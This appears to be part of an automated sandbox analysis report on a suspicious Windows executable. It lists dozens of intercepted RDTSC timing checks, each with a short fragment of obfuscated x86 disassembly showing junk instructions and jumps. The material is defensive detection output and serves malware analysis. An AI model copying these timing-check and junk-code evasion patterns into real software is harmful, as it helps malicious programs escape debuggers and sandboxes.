                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CE7EFF second address: CE7F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CFF8F9 second address: CFF8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CFF8FD second address: CFF91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CFF91D second address: CFF93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F34D94219F5h 0x0000000b jmp 00007F34D94219E1h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CFF93C second address: CFF942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CFFBB4 second address: CFFBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: CFFE70 second address: CFFE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D0029E second address: D002DB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F34D94219F0h 0x00000008 jmp 00007F34D94219DFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F34D94219D8h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D00579 second address: D00590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F34D8F44CC2h 0x0000000b jl 00007F34D8F44CB6h 0x00000011 jc 00007F34D8F44CB6h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D03388 second address: D0338C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D038C4 second address: D038C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D038C9 second address: D038D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F34D94219D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D038D4 second address: D038E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F34D8F44CB8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D038E6 second address: D038EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D038EB second address: D03946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D8F44CB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122DB3ECh], edx 0x00000014 push dword ptr [ebp+122D1FD0h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F34D8F44CB8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jl 00007F34D8F44CBCh 0x0000003a mov edx, dword ptr [ebp+122D3319h] 0x00000040 and edx, dword ptr [ebp+122D33D1h] 0x00000046 push C5BAC5A1h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F34D8F44CBAh 0x00000052 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D06321 second address: D0632C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F34D94219D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: D0632C second address: D06339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F34D8F44CC2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A000B second address: 53A0011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0011 second address: 53A0015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0015 second address: 53A0019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0019 second address: 53A00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F34D8F44CC8h 0x0000000e push eax 0x0000000f jmp 00007F34D8F44CBBh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov cx, C8CBh 0x0000001a pushfd 0x0000001b jmp 00007F34D8F44CC0h 0x00000020 sub al, FFFFFFD8h 0x00000023 jmp 00007F34D8F44CBBh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F34D8F44CC4h 0x00000033 sub esi, 3628B638h 0x00000039 jmp 00007F34D8F44CBBh 0x0000003e popfd 0x0000003f call 00007F34D8F44CC8h 0x00000044 mov ecx, 2288B0F1h 0x00000049 pop ecx 0x0000004a popad 0x0000004b pop ebp 0x0000004c pushad 0x0000004d push edi 0x0000004e mov dl, cl 0x00000050 pop edi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushfd 0x00000054 jmp 00007F34D8F44CBEh 0x00000059 add ecx, 521B5AF8h 0x0000005f jmp 00007F34D8F44CBBh 0x00000064 popfd 0x00000065 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390097 second address: 53900DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F34D94219E6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F34D94219E7h 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53900DC second address: 539011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F34D8F44CBBh 0x0000000b sub ch, FFFFFFBEh 0x0000000e jmp 00007F34D8F44CC9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F34D8F44CBDh 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0E69 second address: 53C0E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0E6D second address: 53C0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0E85 second address: 53C0EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F34D94219E6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov esi, 577D452Fh 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0EB8 second address: 53C0ED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53600ED second address: 536012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F34D94219DDh 0x0000000b and esi, 0DF073E6h 0x00000011 jmp 00007F34D94219E1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F34D94219DDh 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536012D second address: 5360133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360133 second address: 5360137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360137 second address: 536013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536013B second address: 536016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, 484073F7h 0x00000013 pushfd 0x00000014 jmp 00007F34D94219DCh 0x00000019 sbb si, C9E8h 0x0000001e jmp 00007F34D94219DBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536016D second address: 5360173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360173 second address: 5360177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380CA4 second address: 5380CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC0h 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380CC8 second address: 5380CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380CD7 second address: 5380CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F34D8F44CBFh 0x00000008 push eax 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov si, di 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380CF6 second address: 5380D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 jmp 00007F34D94219DFh 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F34D94219E5h 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380D25 second address: 5380D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CBCh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380D35 second address: 5380D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F34D94219E8h 0x00000011 jmp 00007F34D94219E2h 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380865 second address: 5380869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380869 second address: 538086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 538086F second address: 5380885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC2h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380885 second address: 53808F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F34D94219E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F34D94219E1h 0x00000019 and ah, FFFFFF86h 0x0000001c jmp 00007F34D94219E1h 0x00000021 popfd 0x00000022 mov ch, 5Ch 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F34D94219E6h 0x0000002d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53807B6 second address: 5380833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CBFh 0x00000009 jmp 00007F34D8F44CC3h 0x0000000e popfd 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jmp 00007F34D8F44CC0h 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007F34D8F44CC0h 0x00000023 mov ebp, esp 0x00000025 jmp 00007F34D8F44CC0h 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F34D8F44CC7h 0x00000032 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380590 second address: 5380594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380594 second address: 53805B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390392 second address: 53903AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53903AB second address: 53903B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0D93 second address: 53C0E0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219DFh 0x00000009 sub eax, 3D21896Eh 0x0000000f jmp 00007F34D94219E9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F34D94219E0h 0x0000001b jmp 00007F34D94219E5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 jmp 00007F34D94219E1h 0x0000002a xchg eax, ebp 0x0000002b pushad 0x0000002c push eax 0x0000002d pushad 0x0000002e popad 0x0000002f pop ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 mov eax, 29D0CFDBh 0x00000037 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0E0F second address: 53C0E4D instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov si, 9DAFh 0x0000000f pushad 0x00000010 mov si, F4C1h 0x00000014 jmp 00007F34D8F44CBEh 0x00000019 popad 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F34D8F44CC7h 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0E4D second address: 53C0E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A03E9 second address: 53A03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A03EF second address: 53A0406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E3h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0406 second address: 53A042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ax, 3469h 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A042D second address: 53A0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F34D94219E4h 0x0000000c and ax, EF38h 0x00000011 jmp 00007F34D94219DBh 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a call 00007F34D94219DFh 0x0000001f mov edi, esi 0x00000021 pop esi 0x00000022 pushad 0x00000023 mov eax, ebx 0x00000025 call 00007F34D94219E7h 0x0000002a pop esi 0x0000002b popad 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov ebx, 134150C2h 0x00000036 popad 0x00000037 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0495 second address: 53A0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F34D8F44CC0h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 jmp 00007F34D8F44CC0h 0x00000018 and dword ptr [eax], 00000000h 0x0000001b pushad 0x0000001c jmp 00007F34D8F44CBEh 0x00000021 mov di, ax 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F34D8F44CC3h 0x00000030 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0505 second address: 53A0521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 803Ah 0x00000007 jmp 00007F34D94219DBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0521 second address: 53A0525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0525 second address: 53A052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A052B second address: 53A0531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0531 second address: 53A0535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0535 second address: 53A0539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53806DE second address: 53806E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53806E4 second address: 538070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC4h 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 538070C second address: 5380726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380726 second address: 538072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 538072A second address: 538072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 538072E second address: 5380734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5380734 second address: 538073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 538073A second address: 538073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390ED3 second address: 5390EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E4h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390EEB second address: 5390EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5390EEF second address: 5390F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F34D94219E7h 0x0000000f pop ebp 0x00000010 pushad 0x00000011 call 00007F34D94219E4h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0233 second address: 53A0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0237 second address: 53A023B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A023B second address: 53A0241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0241 second address: 53A0247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
